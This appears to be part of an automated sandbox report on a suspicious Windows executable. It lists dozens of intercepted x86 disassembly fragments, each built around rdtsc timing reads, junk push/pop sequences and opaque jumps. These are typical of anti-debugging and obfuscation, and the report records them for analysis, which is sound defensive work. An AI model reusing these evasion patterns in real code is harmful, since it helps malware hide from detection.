Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C001C8 second address: C001D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007FDAD0CA5E2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C001D5 second address: C001DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00327 second address: C00333 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00333 second address: C00337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00337 second address: C00343 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FDAD0CA5E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00343 second address: C00355 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007FDAD10EAC36h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04407 second address: A83C4E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAD0CA5E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 22AA1AB8h 0x00000011 jo 00007FDAD0CA5E29h 0x00000017 mov si, di 0x0000001a mov dword ptr [ebp+122D249Ch], eax 0x00000020 push dword ptr [ebp+122D078Dh] 0x00000026 jmp 00007FDAD0CA5E31h 0x0000002b call dword ptr [ebp+122D25D5h] 0x00000031 pushad 0x00000032 cld 0x00000033 ja 00007FDAD0CA5E2Ch 0x00000039 xor eax, eax 0x0000003b mov dword ptr [ebp+122D26B3h], ebx 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jmp 00007FDAD0CA5E34h 0x0000004a mov dword ptr [ebp+122D2BDEh], eax 0x00000050 pushad 0x00000051 pushad 0x00000052 and eax, dword ptr [ebp+122D2EEAh] 0x00000058 add dx, 65BDh 0x0000005d popad 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 mov dword ptr [ebp+122D228Ch], ecx 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e xor dword ptr [ebp+122D26B3h], eax 0x00000074 lodsw 0x00000076 add dword ptr [ebp+122D26B3h], ebx 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 xor dword ptr [ebp+122D26B3h], ebx 0x00000086 stc 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b cld 0x0000008c push eax 0x0000008d pushad 0x0000008e push eax 0x0000008f push edx 0x00000090 push eax 0x00000091 push edx 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0447C second address: C04480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C045E2 second address: C0467E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDAD0CA5E2Ch 0x00000008 jng 00007FDAD0CA5E26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FDAD0CA5E36h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FDAD0CA5E28h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov edi, 6C1C379Bh 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FDAD0CA5E28h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D2875h], edx 0x00000058 call 00007FDAD0CA5E29h 0x0000005d jnl 00007FDAD0CA5E2Eh 0x00000063 push eax 0x00000064 pushad 0x00000065 pushad 0x00000066 jl 00007FDAD0CA5E26h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0467E second address: C046B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDAD10EAC40h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FDAD10EAC45h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C046B4 second address: C046D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDAD0CA5E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FDAD0CA5E28h 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C046D1 second address: C046D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C046D5 second address: C046DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C046DB second address: C04775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a cmc 0x0000000b push 00000003h 0x0000000d mov dword ptr [ebp+122D1D10h], ecx 0x00000013 push 00000000h 0x00000015 movzx edx, cx 0x00000018 mov dword ptr [ebp+122D26A4h], esi 0x0000001e push 00000003h 0x00000020 jc 00007FDAD10EAC3Dh 0x00000026 jng 00007FDAD10EAC56h 0x0000002c jg 00007FDAD10EAC50h 0x00000032 call 00007FDAD10EAC39h 0x00000037 jl 00007FDAD10EAC43h 0x0000003d push edi 0x0000003e jmp 00007FDAD10EAC3Bh 0x00000043 pop edi 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FDAD10EAC49h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04775 second address: C04797 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDAD0CA5E2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jng 00007FDAD0CA5E32h 0x00000014 jl 00007FDAD0CA5E2Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04797 second address: C047A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jg 00007FDAD10EAC36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C047A8 second address: C047AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C047AD second address: C047C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC42h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0493B second address: C0493F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0493F second address: C04989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDAD10EAC40h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push ecx 0x00000010 jnc 00007FDAD10EAC3Ch 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c push edx 0x0000001d jbe 00007FDAD10EAC36h 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FDAD10EAC43h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04989 second address: C049D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FDAD0CA5E2Ah 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 jo 00007FDAD0CA5E28h 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDAD0CA5E36h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2325F second address: C23280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC42h 0x00000007 jnc 00007FDAD10EAC36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C234F4 second address: C234FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C234FD second address: C23503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23503 second address: C2352A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDAD0CA5E2Ch 0x00000010 jmp 00007FDAD0CA5E30h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2352A second address: C2352E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2352E second address: C23544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FDAD0CA5E2Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23544 second address: C23549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23549 second address: C23562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDAD0CA5E34h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23562 second address: C23568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C236C8 second address: C236CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C236CE second address: C236D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C236D4 second address: C236D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C236D9 second address: C236DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C236DF second address: C236E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C236E3 second address: C236EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23849 second address: C23853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FDAD0CA5E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23AE9 second address: C23B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD10EAC49h 0x00000009 je 00007FDAD10EAC36h 0x0000000f jmp 00007FDAD10EAC49h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23FC8 second address: C23FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23FD0 second address: C23FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24133 second address: C24137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C199A5 second address: C199B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C199B1 second address: C199CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD0CA5E38h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA0BB second address: BFA0BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C242C4 second address: C242C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24844 second address: C2484A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2484A second address: C2484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2484E second address: C24856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24856 second address: C2485B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2485B second address: C2486B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDAD10EAC36h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24F4F second address: C24F59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24F59 second address: C24F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24F5F second address: C24F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C26C19 second address: C26C30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C28405 second address: C2840B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE2C6C second address: BE2C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1B32 second address: BF1B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Dh 0x00000007 pushad 0x00000008 jmp 00007FDAD0CA5E33h 0x0000000d jo 00007FDAD0CA5E26h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FDAD0CA5E45h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1B68 second address: BF1B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD10EAC49h 0x00000009 jmp 00007FDAD10EAC41h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1B96 second address: BF1BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDAD0CA5E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F8F5 second address: C2F901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2FA31 second address: C2FA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2FA37 second address: C2FA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FDAD10EAC56h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDAD10EAC3Ch 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2FA52 second address: C2FA5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2FCEB second address: C2FCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2FCEF second address: C2FD2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FDAD0CA5E2Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jg 00007FDAD0CA5E26h 0x00000014 jnp 00007FDAD0CA5E3Ah 0x0000001a popad 0x0000001b push esi 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f jnl 00007FDAD0CA5E26h 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2FEA5 second address: C2FEAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3108A second address: C31093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31093 second address: C31097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3113C second address: C31146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FDAD0CA5E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C314E7 second address: C314EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C314EB second address: C314EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C316C3 second address: C316E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDAD10EAC46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C316E4 second address: C316EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31D34 second address: C31D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31E30 second address: C31E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31F0B second address: C31F11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31F11 second address: C31F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FDAD0CA5E33h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C322DC second address: C322E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C322E1 second address: C322E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C322E7 second address: C32314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D24E3h], esi 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 jmp 00007FDAD10EAC49h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32314 second address: C32341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FDAD0CA5E2Ch 0x00000013 je 00007FDAD0CA5E26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34A28 second address: C34A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDAD10EAC36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34A32 second address: C34A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C376F1 second address: C376F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C36A20 second address: C36A2A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDAD0CA5E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37FDA second address: C37FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37FE0 second address: C37FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF3649 second address: BF364D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D189 second address: C3D18E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3C2D8 second address: C3C2FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FDAD10EAC42h 0x00000010 jnl 00007FDAD10EAC3Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D2EC second address: C3D2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3E1E4 second address: C3E1E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
